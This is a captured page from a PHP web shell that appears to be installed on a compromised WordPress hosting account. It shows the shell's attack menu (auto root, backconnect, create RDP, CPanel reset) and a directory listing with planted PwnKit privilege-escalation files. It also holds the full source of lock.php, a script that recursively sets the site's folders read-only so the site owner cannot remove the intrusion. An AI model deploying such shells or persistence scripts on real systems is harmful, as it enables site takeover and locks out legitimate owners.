Linux server241.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 199.188.200.87 | : 216.73.216.149
Cant Read [ /etc/named.conf ]
8.0.30
emerlyju
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
emerlyju /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
dr-xr-xr-x
wp-admin
[ DIR ]
dr-xr-xr-x
wp-content
[ DIR ]
dr-xr-xr-x
wp-includes
[ DIR ]
dr-xr-xr-x
.hcflag
31
B
-r-xr-xr-x
.htaccess
649
B
-r--r--r--
.litespeed_flag
297
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
admin.php
41.11
KB
-r-xr-xr-x
error_log
438.85
KB
-r-xr-xr-x
index.php
12.29
KB
-r--r--r--
license.txt
19.44
KB
-r-xr-xr-x
lock.php
1.93
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.25
KB
-r-xr-xr-x
stg.txt
1
B
-r-xr-xr-x
style.php
26
B
-r-xr-xr-x
w-w.gz
70.99
KB
-r-xr-xr-x
w-w.php
139
B
-r-xr-xr-x
wp-activate.php
7.18
KB
-r-xr-xr-x
wp-comments-post.php
2.27
KB
-r-xr-xr-x
wp-config-sample.php
3.26
KB
-r-xr-xr-x
wp-config.php
3.19
KB
-r-xr-xr-x
wp-links-opml.php
2.43
KB
-r-xr-xr-x
wp-load.php
3.84
KB
-r-xr-xr-x
wp-login.php
50.23
KB
-r-xr-xr-x
wp-mail.php
8.52
KB
-r-xr-xr-x
wp-settings.php
30.33
KB
-r-xr-xr-x
wp-signup.php
33.71
KB
-r-xr-xr-x
wp-trackback.php
5.09
KB
-r-xr-xr-x
xmlrpc.php
3.13
KB
-r-xr-xr-x
xw.zip
4.75
KB
-r-xr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lock.php
<?php $path = $_SERVER['DOCUMENT_ROOT']; $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https" : "http"; $host = $_SERVER['HTTP_HOST']; $url = $protocol . "://" . $host . $_SERVER['SCRIPT_NAME']; $type = $_REQUEST['type']; $count = 0; if($type == 'lock'){ $folder_list = getAllFolders($path, 8); foreach($folder_list as $k=>$v){ $flag = chmodFolder($v, 0555); if($flag){$count++;} } echo 'all is '.count($folder_list).';'.$count.'is lock success'; }else if($type == 'unlock'){ $folder_list = getAllFolders($path, 8); foreach($folder_list as $k=>$v){ $flag = chmodFolder($v, 0755); $file_url = $v.'/.htaccess'; chmodFolder($file_url, 0755); if($flag){$count++;} } echo 'all is '.count($folder_list).';'.$count.'is unlock success'; } function getAllFolders($path = '.', $maxDepth = 8, $currentDepth = 1) { $directories = []; if ($currentDepth > $maxDepth) { return $directories; } $items = scandir($path); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $fullPath = $path . DIRECTORY_SEPARATOR . $item; if (is_dir($fullPath)) { $directories[] = $fullPath; $subDirs = getAllFolders($fullPath, $maxDepth, $currentDepth + 1); $directories = array_merge($directories, $subDirs); } } return $directories; } function chmodFolder($dir, $dirMode){ $flag = false; if (chmod($dir, $dirMode)) { $flag = true; } else { $flag = false; } return $flag; } ?> <html> <head> <title>test</title> <head> <body> <a href="<?php echo $url;?>?type=lock&time=<?php echo time();?>">全部锁文件夹</a> <a href="<?php echo $url;?>?type=unlock&time=<?php echo time();?>">全部解锁</a> </body> </html>
Close